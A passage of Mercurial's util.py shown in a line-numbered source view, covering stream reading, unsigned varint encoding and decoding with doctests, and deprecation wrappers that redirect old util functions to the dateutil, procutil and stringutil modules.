3689 3690 if fn not in ctx and fn not in others:
3690 3691 return fn
3691 3692
3692 3693 def readexactly(stream, n):
3693 3694 '''read n bytes from stream.read and abort if less was available'''
3694 3695 s = stream.read(n)
3695 3696 if len(s) < n:
3696 3697 raise error.Abort(_("stream ended unexpectedly"
3697 3698 " (got %d bytes, expected %d)")
3698 3699 % (len(s), n))
3699 3700 return s
3700 3701
3701 3702 def uvarintencode(value):
3702 3703 """Encode an unsigned integer value to a varint.
3703 3704
3704 3705 A varint is a variable length integer of 1 or more bytes. Each byte
3705 3706 except the last has the most significant bit set. The lower 7 bits of
3706 3707 each byte store the 2's complement representation, least significant group
3707 3708 first.
3708 3709
3709 3710 >>> uvarintencode(0)
3710 3711 '\\x00'
3711 3712 >>> uvarintencode(1)
3712 3713 '\\x01'
3713 3714 >>> uvarintencode(127)
3714 3715 '\\x7f'
3715 3716 >>> uvarintencode(1337)
3716 3717 '\\xb9\\n'
3717 3718 >>> uvarintencode(65536)
3718 3719 '\\x80\\x80\\x04'
3719 3720 >>> uvarintencode(-1)
3720 3721 Traceback (most recent call last):
3721 3722 ...
3722 3723 ProgrammingError: negative value for uvarint: -1
3723 3724 """
3724 3725 if value < 0:
3725 3726 raise error.ProgrammingError('negative value for uvarint: %d'
3726 3727 % value)
3727 3728 bits = value & 0x7f
3728 3729 value >>= 7
3729 3730 bytes = []
3730 3731 while value:
3731 3732 bytes.append(pycompat.bytechr(0x80 | bits))
3732 3733 bits = value & 0x7f
3733 3734 value >>= 7
3734 3735 bytes.append(pycompat.bytechr(bits))
3735 3736
3736 3737 return ''.join(bytes)
3737 3738
3738 3739 def uvarintdecodestream(fh):
3739 3740 """Decode an unsigned variable length integer from a stream.
3740 3741
3741 3742 The passed argument is anything that has a ``.read(N)`` method.
3742 3743
3743 3744 >>> try:
3744 3745 ... from StringIO import StringIO as BytesIO
3745 3746 ... except ImportError:
3746 3747 ... from io import BytesIO
3747 3748 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3748 3749 0
3749 3750 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3750 3751 1
3751 3752 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3752 3753 127
3753 3754 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3754 3755 1337
3755 3756 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3756 3757 65536
3757 3758 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3758 3759 Traceback (most recent call last):
3759 3760 ...
3760 3761 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3761 3762 """
3762 3763 result = 0
3763 3764 shift = 0
3764 3765 while True:
3765 3766 byte = ord(readexactly(fh, 1))
3766 3767 result |= ((byte & 0x7f) << shift)
3767 3768 if not (byte & 0x80):
3768 3769 return result
3769 3770 shift += 7
3770 3771
3771 3772 ###
3772 3773 # Deprecation warnings for util.py splitting
3773 3774 ###
3774 3775
3775 3776 def _deprecatedfunc(func, version, modname=None):
3776 3777 def wrapped(*args, **kwargs):
3777 3778 fn = pycompat.sysbytes(func.__name__)
3778 3779 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 3780 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 3781 nouideprecwarn(msg, version)
3781 3782 return func(*args, **kwargs)
3782 3783 wrapped.__name__ = func.__name__
3783 3784 return wrapped
3784 3785
3785 3786 defaultdateformats = dateutil.defaultdateformats
3786 3787 extendeddateformats = dateutil.extendeddateformats
3787 3788 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 3789 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 3790 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 3791 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 3792 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 3793 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 3794 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794 3795
3795 3796 stderr = procutil.stderr
3796 3797 stdin = procutil.stdin
3797 3798 stdout = procutil.stdout
3798 3799 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 3800 modname='utils.procutil')
3800 3801 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 3802 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 3803 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 3804 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 3805 modname='utils.procutil')
3805 3806 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 3807 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 3808 modname='utils.procutil')
3808 3809 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 3810 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 3811 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 3812 modname='utils.procutil')
3812 3813 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 3814 modname='utils.procutil')
3814 3815 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 3816 modname='utils.procutil')
3816 3817 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 3818 modname='utils.procutil')
3818 3819 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 3820 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3820 3821 try:
3821 3822 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 3823 modname='utils.procutil')
3823 3824 except AttributeError:
3824 3825 pass
3825 3826 try:
3826 3827 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 3828 modname='utils.procutil')
3828 3829 except AttributeError:
3829 3830 pass
3830 3831 closefds = procutil.closefds
3831 3832 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3832 3833 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3833 3834 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3834 3835 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3835 3836 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3836 3837 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3837 3838 filter = _deprecatedfunc(procutil.filter, '4.6')
3838 3839 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3839 3840 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3840 3841 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3841 3842 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3842 3843 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3843 3844 system = _deprecatedfunc(procutil.system, '4.6')
3844 3845 gui = _deprecatedfunc(procutil.gui, '4.6')
3845 3846 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3846 3847 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3847 3848
3848 3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3849 3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3850 3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3851 3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3852 3853 email = _deprecatedfunc(stringutil.email, '4.6')
3853 3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3854 3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3855 3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3856 3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3857 3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3858 3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3859 3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now